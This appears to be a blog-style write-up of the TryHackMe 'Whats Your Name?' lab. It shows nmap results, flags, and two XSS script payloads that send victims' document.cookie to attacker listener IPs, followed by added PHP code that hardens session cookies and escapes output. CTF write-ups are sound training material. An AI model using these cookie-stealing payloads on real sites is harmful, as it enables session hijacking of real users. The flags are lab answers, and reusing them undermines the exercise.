
Training Update v0.103


Following on from the CORS & SOP room, we are now on to the last section of the Advanced Client-Side Attacks section on the Web Application Pentesting pathway on THM, and we move on to the Whats Your Name? challenge room.

I have a feeling that this may be difficult for me, as I struggled through a lot of the sections within this module and list of rooms, but we shall persist onwards!


22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 36:db:b3:90:8e:ef:30:93:77:cb:9a:5f:a3:61:f1:1f (RSA)
| ssh-rsa

80/tcp   open  http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
| http-title: Welcome
|_Requested resource was /public/html/
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)

8081/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)


http://login.worldwap.thm/


http://login.worldwap.thm/login.php

<script>document.location = 'http://10.11.125.150:8000/steal_cookie.php?cookie='+document.cookie</script>

Flag – ModP@wnEd


http://login.worldwap.thm/chat.php


http://worldwap.thm/public/html/upload.php


Uploading did not work and I could not reach the location to trigger the .php shell.

<script>var i=new Image(); i.src="//10.10.41.197:4446/?cookie="+document.cookie;</script>
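The nmap output above already shows why both cookie payloads work: PHPSESSID is issued without the httponly flag, so any injected script can read it from document.cookie. As an added example (not code from the room or from this writeup), this is how a PHP app would issue its session cookie hardened against that; the file and function names are assumed.

```php
<?php
// Added example, not the room's code. Assumes a plain PHP app like the
// target's login.php / chat.php (file names assumed) served over HTTPS.

// Weak (what the nmap http-cookie-flags script flagged): the PHP defaults
// issue PHPSESSID without HttpOnly, Secure or SameSite, so an injected
// <script> can read document.cookie and send it to a listener elsewhere.
//
//   session_start();   // nothing else configured

// Hardened: set the cookie attributes before the session is started.
// The array form with 'samesite' needs PHP 7.3+.
session_set_cookie_params([
    'lifetime' => 0,         // session cookie, dropped when the browser closes
    'path'     => '/',
    'domain'   => '',        // current host only, not shared with subdomains
    'secure'   => true,      // only sent over HTTPS
    'httponly' => true,      // hidden from document.cookie, so not stealable via XSS
    'samesite' => 'Strict',  // never attached to cross-site requests
]);
ini_set('session.use_strict_mode', '1');  // refuse session ids the server never issued
ini_set('session.use_only_cookies', '1'); // never accept a session id from the URL
session_start();

// Refuse inline scripts and loads from other origins, so an injected
// <script> does not run and an <img> beacon to another host is blocked.
header("Content-Security-Policy: default-src 'self'");

// Regenerate the id whenever privileges change (e.g. after login), so an id
// captured or fixated before login is worthless afterwards.
function on_successful_login(string $username): void {
    session_regenerate_id(true);
    $_SESSION['user'] = $username;
}

// HttpOnly only hides the cookie; the injected script still runs. The root
// fix is to escape user input wherever it is echoed back (chat messages,
// profile names), so the <script> tag never becomes markup.
function render_message(string $msg): string {
    return htmlspecialchars($msg, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}
```

With this in place, document.cookie no longer contains PHPSESSID, and the CSP refuses both the inline script and the image beacon to another host.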

Flag – AdM!nP@wnEd

Needed to check a guide during this task. It was quite annoying trying to get the initial moderator flag, but the admin flag was the same: you get your own flag first again, and then you get the admin flag once you open up netcat again.

I don’t quite understand why the application is spitting out high-level user flags; it doesn’t quite make sense, and you don’t need to use CSRF, only XSS. The profile upload section was janky and I wasn’t able to upload files, even though I know that is another route to go down. Very strange machine.


Until next time & don’t sleepwalk through life!

Goodbye